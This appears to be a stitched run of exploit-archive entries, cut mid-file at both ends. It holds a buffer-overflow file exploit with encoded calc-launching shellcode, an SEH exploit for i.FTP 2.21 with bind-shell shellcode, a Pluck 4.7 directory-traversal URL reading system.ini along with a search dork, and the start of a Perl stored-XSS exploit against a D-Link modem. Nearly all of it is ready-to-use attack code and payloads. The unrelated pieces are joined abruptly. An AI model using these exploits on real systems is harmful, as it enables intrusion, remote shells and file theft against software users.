"\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f\x63"
"\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f\x46"
"\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x3e\x0d"
"\x0a\x3c\x49\x73\x53\x70\x6c\x69\x74\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x3e\x0d\x0a\x3c\x53\x70"
"\x6c\x69\x74\x4c\x65\x6e\x67\x74\x68\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x31\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78"
"\x74\x3d\x27\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4c\x65\x6e\x67\x74"
"\x68\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x42\x79\x53\x69\x7a\x65"
"\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69"
"\x74\x42\x79\x53\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x53"
"\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74\x50\x61\x72\x74\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74"
"\x50\x61\x72\x74\x73\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x4d\x61"
"\x78\x53\x69\x7a\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x36\x30\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4d\x61\x78\x53\x69\x7a\x65\x3e"
"\x0d\x0a\x3c\x45\x78\x61\x63\x74\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x45\x78\x61\x63\x74\x6c\x79\x3e\x0d\x0a\x3c\x2f\x49\x73"
"\x53\x70\x6c\x69\x74\x3e\x0d\x0a\x3c\x4a\x6f\x69\x6e\x53\x75\x62"
"\x54\x69\x6d\x65\x4c\x69\x6e\x65\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4a\x6f\x69\x6e\x53\x75\x62\x54\x69\x6d\x65\x4c\x69\x6e\x65\x3e"
"\x0d\x0a\x3c\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x3e\x0d\x0a\x3c\x2f"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x52\x6f\x6f\x74\x5f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69"
"\x76\x65\x46\x72\x61\x6d\x65\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73"
"\x65\x72\x74\x45\x76\x65\x72\x79\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x32\x35\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65"
"\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73\x65\x72\x74\x45\x76\x65\x72"
"\x79\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x77\x65"
"\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x52\x6f\x6f\x74\x5f"
"\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x3e"
"\x0d\x0a\x3c\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69\x6c"
"\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69"
"\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62\x6e"
"\x61\x69\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d"
"\x62\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f"
"\x6e\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x46\x69\x6c\x65\x46\x6f\x72\x6d\x61\x74"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x7b\x31\x41\x44\x43\x33\x33\x42"
"\x39\x2d\x35\x39\x36\x44\x2d\x34\x33\x30\x43\x2d\x42\x35\x39\x41"
"\x2d\x36\x44\x37\x37\x41\x42\x43\x42\x35\x46\x44\x39\x7d\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x37\x32\x27\x3e\x0d\x0a\x3c\x47\x49\x46"
"\x41\x3e\x0d\x0a\x3c\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x50\x61\x6c"
"\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f"
"\x72\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x38\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x73"
"\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x3e\x0d\x0a\x3c"
"\x2f\x50\x61\x6c\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c"
"\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x3c\x46\x72\x61"
"\x6d\x65\x44\x65\x6c\x61\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x31"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x30\x6d\x73\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x44\x65\x6c\x61\x79"
"\x3e\x0d\x0a\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x52\x65\x70\x65\x74\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74\x52\x65\x70\x65"
"\x74\x3e\x0d\x0a\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x2f\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d"
"\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61"
"\x6d\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75"
"\x6e\x74\x53\x6b\x69\x70\x20\x76\x61\x6c\x75\x65\x3d\x27\x31\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43"
"\x6f\x75\x6e\x74\x53\x6b\x69\x70\x3e\x0d\x0a\x3c\x46\x72\x61\x6d"
"\x65\x50\x61\x74\x74\x65\x72\x6e\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x3b\x35\x3b\x37\x3b\x32\x35\x3b\x33\x32\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x50"
"\x61\x74\x74\x65\x72\x6e\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x53\x6f\x75\x72\x63\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d"
"\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x46\x72\x61"
"\x6d\x65\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74"
"\x46\x72\x61\x6d\x65\x73\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f"
"\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x3e\x0d"
"\x0a\x3c\x2f\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74"
"\x65\x72\x73\x3e\x0d\x0a\x3c\x53\x69\x7a\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x26\x6c\x74\x3b\x73\x6f\x75\x72\x63\x65\x26\x67\x74"
"\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x72\x69\x67\x69"
"\x6e\x61\x6c\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4f\x72\x69\x67\x69\x6e\x61\x6c\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x3e\x0d\x0a"
"\x3c\x2f\x53\x69\x7a\x65\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x44"
"\x65\x70\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x35\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f"
"\x72\x44\x65\x70\x74\x68\x3e\x0d\x0a\x3c\x43\x72\x6f\x70\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x26\x6c\x74\x3b\x6e\x6f\x6e\x65\x26\x67"
"\x74\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c"
"\x2f\x43\x72\x6f\x70\x3e\x0d\x0a\x3c\x57\x61\x74\x65\x72\x4d\x61"
"\x72\x6b\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x57\x61\x74\x65\x72\x4d"
"\x61\x72\x6b\x3e\x0d\x0a\x3c\x46\x69\x6c\x74\x65\x72\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x69\x6c\x74\x65\x72\x73\x3e\x0d\x0a\x3c"
"\x2f\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f\x47"
"\x49\x46\x41\x3e\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x46\x69"
"\x6c\x65\x46\x6f\x72\x6d\x61\x74\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b"
"\x44\x69\x72\x73\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b\x44\x69\x72\x45"
"\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x73\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d"
"\x0a\x3c\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65"
"\x72\x6e\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61"
"\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62"
"\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x4d\x61\x69"
"\x6e\x3e\x0d\x0a"
)
buffersize = 1000
payload = "\x41" * 230
# JMP ESP [urlmon.dll]
payload += struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=calc R |msfencode BufferRegister=ESP -e x=
86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=1)
#
payload += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x69\x78" +
"\x4d\x59\x37\x70\x63\x30\x55\x50\x51\x70\x6b\x39\x38\x65" +
"\x76\x51\x38\x52\x73\x54\x4e\x6b\x32\x72\x46\x50\x6c\x4b" +
"\x43\x62\x74\x4c\x6c\x4b\x32\x72\x74\x54\x6c\x4b\x74\x32" +
"\x37\x58\x56\x6f\x4f\x47\x52\x6a\x65\x76\x66\x51\x49\x6f" +
"\x36\x51\x39\x50\x4e\x4c\x37\x4c\x35\x31\x43\x4c\x57\x72" +
"\x56\x4c\x61\x30\x4f\x31\x4a\x6f\x46\x6d\x67\x71\x68\x47" +
"\x6d\x32\x68\x70\x43\x62\x53\x67\x6e\x6b\x56\x32\x62\x30" +
"\x4e\x6b\x72\x62\x55\x6c\x45\x51\x6e\x30\x4e\x6b\x61\x50" +
"\x70\x78\x6b\x35\x6f\x30\x63\x44\x63\x7a\x33\x31\x6a\x70" +
"\x70\x50\x4c\x4b\x62\x68\x65\x48\x6c\x4b\x33\x68\x37\x50" +
"\x47\x71\x39\x43\x6b\x53\x35\x6c\x77\x39\x4c\x4b\x34\x74" +
"\x6e\x6b\x73\x31\x6a\x76\x50\x31\x49\x6f\x55\x61\x4b\x70" +
"\x6e\x4c\x69\x51\x5a\x6f\x74\x4d\x56\x61\x5a\x67\x35\x68" +
"\x6b\x50\x33\x45\x38\x74\x57\x73\x33\x4d\x59\x68\x75\x6b" +
"\x31\x6d\x34\x64\x44\x35\x4b\x52\x31\x48\x4c\x4b\x46\x38" +
"\x65\x74\x77\x71\x6a\x73\x35\x36\x6e\x6b\x56\x6c\x30\x4b" +
"\x4c\x4b\x62\x78\x77\x6c\x35\x51\x59\x43\x6c\x4b\x33\x34" +
"\x4c\x4b\x73\x31\x6e\x30\x6b\x39\x72\x64\x44\x64\x75\x74" +
"\x43\x6b\x51\x4b\x65\x31\x52\x79\x62\x7a\x53\x61\x6b\x4f" +
"\x69\x70\x56\x38\x33\x6f\x73\x6a\x4c\x4b\x64\x52\x38\x6b" +
"\x6b\x36\x43\x6d\x51\x7a\x63\x31\x6c\x4d\x6c\x45\x68\x39" +
"\x57\x70\x47\x70\x45\x50\x32\x70\x55\x38\x54\x71\x4e\x6b" +
"\x50\x6f\x6f\x77\x4b\x4f\x59\x45\x6f\x4b\x58\x70\x6c\x75" +
"\x4f\x52\x43\x66\x70\x68\x6e\x46\x6e\x75\x6f\x4d\x4f\x6d" +
"\x4b\x4f\x59\x45\x75\x6c\x47\x76\x33\x4c\x55\x5a\x4d\x50" +
"\x6b\x4b\x59\x70\x64\x35\x73\x35\x6f\x4b\x73\x77\x35\x43" +
"\x64\x32\x62\x4f\x71\x7a\x43\x30\x33\x63\x4b\x4f\x6e\x35" +
"\x62\x43\x73\x51\x32\x4c\x31\x73\x53\x30\x41\x41"
)
payload += "\x41" * (buffersize - len(payload))
sploit = header + payload + footer
print "[*] Creating .vcc file"
try:
print "[+]Creating Exploit File...\n"
file = open("noname1.vcc","wb")
file.write(sploit)
file.close
print "[+]File noname1.vcc create successfully.\n"
except:
print "**[-]Error: #{$!}\n"
#!/usr/bin/python
# Exploit Title : i.FTP 2.21 Time Field SEH Exploit
# Exploit Author : Revin Hadi S
# Vulnerability PoC : Avinash Kumar Thapa "-Acid"
# PoC Link : https://www.exploit-db.com/exploits/36847/
# Date : 05/08/2015
# Vendor : http://www.memecode.com/iftp.php
# Software Link : http://www.memecode.com/data/iftp-win32-v2.21.exe
# Version : 2.21
# Tested On : Win 7 SP1 Eng & Win XP SP2
# Triggering Exploit : Go to Schedule > Schedule download > {+} >Time field
# msfpayload windows/shell_bind_tcp LPORT=5698 R | msfencode -a x86 -e x86/alpha_upper BufferRegister=EAX -t c
shellcode = ("\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
"\x4c\x4a\x48\x4c\x49\x33\x30\x53\x30\x53\x30\x35\x30\x4b\x39"
"\x4a\x45\x30\x31\x4e\x32\x55\x34\x4c\x4b\x31\x42\x46\x50\x4c"
"\x4b\x51\x42\x54\x4c\x4c\x4b\x46\x32\x35\x44\x4c\x4b\x54\x32"
"\x57\x58\x54\x4f\x38\x37\x31\x5a\x31\x36\x50\x31\x4b\x4f\x36"
"\x51\x59\x50\x4e\x4c\x47\x4c\x53\x51\x53\x4c\x44\x42\x56\x4c"
"\x47\x50\x49\x51\x48\x4f\x54\x4d\x43\x31\x39\x57\x4d\x32\x4a"
"\x50\x51\x42\x50\x57\x4c\x4b\x46\x32\x34\x50\x4c\x4b\x51\x52"
"\x37\x4c\x53\x31\x4e\x30\x4c\x4b\x51\x50\x54\x38\x4d\x55\x39"
"\x50\x32\x54\x50\x4a\x45\x51\x58\x50\x56\x30\x4c\x4b\x50\x48"
"\x44\x58\x4c\x4b\x36\x38\x47\x50\x33\x31\x48\x53\x5a\x43\x47"
"\x4c\x30\x49\x4c\x4b\x36\x54\x4c\x4b\x33\x31\x38\x56\x46\x51"
"\x4b\x4f\x50\x31\x49\x50\x4e\x4c\x4f\x31\x38\x4f\x44\x4d\x55"
"\x51\x48\x47\x46\x58\x4d\x30\x33\x45\x4b\x44\x44\x43\x53\x4d"
"\x4a\x58\x47\x4b\x43\x4d\x47\x54\x54\x35\x5a\x42\x30\x58\x4c"
"\x4b\x31\x48\x51\x34\x53\x31\x49\x43\x52\x46\x4c\x4b\x44\x4c"
"\x30\x4b\x4c\x4b\x36\x38\x45\x4c\x55\x51\x4e\x33\x4c\x4b\x55"
"\x54\x4c\x4b\x43\x31\x38\x50\x4b\x39\x57\x34\x37\x54\x37\x54"
"\x31\x4b\x51\x4b\x53\x51\x51\x49\x51\x4a\x46\x31\x4b\x4f\x4d"
"\x30\x31\x48\x51\x4f\x31\x4a\x4c\x4b\x55\x42\x5a\x4b\x4c\x46"
"\x31\x4d\x33\x58\x46\x53\x47\x42\x43\x30\x43\x30\x43\x58\x52"
"\x57\x42\x53\x36\x52\x31\x4f\x50\x54\x43\x58\x30\x4c\x52\x57"
"\x51\x36\x43\x37\x4b\x4f\x4e\x35\x38\x38\x4c\x50\x55\x51\x33"
"\x30\x35\x50\x46\x49\x4f\x34\x36\x34\x36\x30\x52\x48\x57\x59"
"\x4d\x50\x52\x4b\x53\x30\x4b\x4f\x58\x55\x46\x30\x50\x50\x36"
"\x30\x30\x50\x31\x50\x46\x30\x31\x50\x50\x50\x35\x38\x4b\x5a"
"\x44\x4f\x39\x4f\x4d\x30\x4b\x4f\x39\x45\x4c\x49\x48\x47\x50"
"\x31\x49\x4b\x46\x33\x52\x48\x43\x32\x55\x50\x32\x36\x50\x42"
"\x4c\x49\x4b\x56\x52\x4a\x52\x30\x36\x36\x31\x47\x43\x58\x39"
"\x52\x59\x4b\x57\x47\x32\x47\x4b\x4f\x39\x45\x50\x53\x46\x37"
"\x32\x48\x38\x37\x4b\x59\x56\x58\x4b\x4f\x4b\x4f\x39\x45\x31"
"\x43\x51\x43\x30\x57\x35\x38\x33\x44\x5a\x4c\x57\x4b\x4b\x51"
"\x4b\x4f\x49\x45\x51\x47\x4c\x49\x4f\x37\x33\x58\x33\x45\x42"
"\x4e\x50\x4d\x33\x51\x4b\x4f\x59\x45\x32\x48\x32\x43\x42\x4d"
"\x52\x44\x43\x30\x4c\x49\x5a\x43\x46\x37\x51\x47\x31\x47\x30"
"\x31\x4a\x56\x52\x4a\x34\x52\x50\x59\x31\x46\x4a\x42\x4b\x4d"
"\x53\x56\x39\x57\x57\x34\x31\x34\x47\x4c\x53\x31\x55\x51\x4c"
"\x4d\x31\x54\x46\x44\x52\x30\x38\x46\x55\x50\x51\x54\x46\x34"
"\x30\x50\x30\x56\x36\x36\x46\x36\x50\x46\x31\x46\x50\x4e\x56"
"\x36\x46\x36\x50\x53\x30\x56\x55\x38\x53\x49\x58\x4c\x37\x4f"
"\x4c\x46\x4b\x4f\x59\x45\x4d\x59\x4b\x50\x50\x4e\x46\x36\x50"
"\x46\x4b\x4f\x50\x30\x53\x58\x43\x38\x4d\x57\x45\x4d\x35\x30"
"\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x58\x35\x39\x32\x56\x36\x33"
"\x58\x39\x36\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x37\x4c"
"\x35\x56\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4d\x30\x33\x45\x44"
"\x45\x4f\x4b\x47\x37\x42\x33\x32\x52\x52\x4f\x52\x4a\x35\x50"
"\x31\x43\x4b\x4f\x39\x45\x41\x41")
# Align Shellcode to EAX register
align = "\x58"*3 # POP EAX; POP EAX; POP EAX
align += "\x2d\x77\x77\x77\x77" # SUB EAX, 0x77777777
align += "\x2d\x77\x33\x33\x33" # SUB EAX, 0x33333377
align += "\x2d\x77\x22\x22\x22" # SUB EAX, 0x22222277
align += "\x2d\x3b\x32\x33\x33" # SUB EAX, 0x3333323b
buffer = "A"*300
buffer += "\x40\x75\x21\x40"
buffer += "\x67\x59\x02\x10" # /p/p/r Lgi.dll
buffer += "DOGE"*7
buffer += align
buffer += "\x43"*37
buffer += shellcode
f = open("evil.txt", "wb")
f.write(buffer)
f.close()
# Exploit Title: Pluck 4.7 Directory Traversal
# Google Dork: filetype:php inurl:"/data/modules/albums/albums_getimage.php?image="
# Date: 08/05/15
# Exploit Author: Wadeek
# Vendor Homepage: http://www.pluck-cms.org/?file=home
# Software Link: http://www.opensourcecms.com/scripts/redirect/download.php?id=167
# Version: 4.7
# Tested on: Xampp on Windows7
###################################################################################
PoC = http://127.0.0.1/pluck-4_7/data/modules/albums/albums_getimage.php?image=\..\..\..\..\..\..\..\Windows\system.ini
###################################################################################
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 13-02-2015
# Exploit for D-Link DSL-500B G2
# Cross Site Scripting (XSS Injection) Stored in todmngr.tod URL Filter
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#
use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;
my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
if (@ARGV != 3){
print "\n";
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
}else{
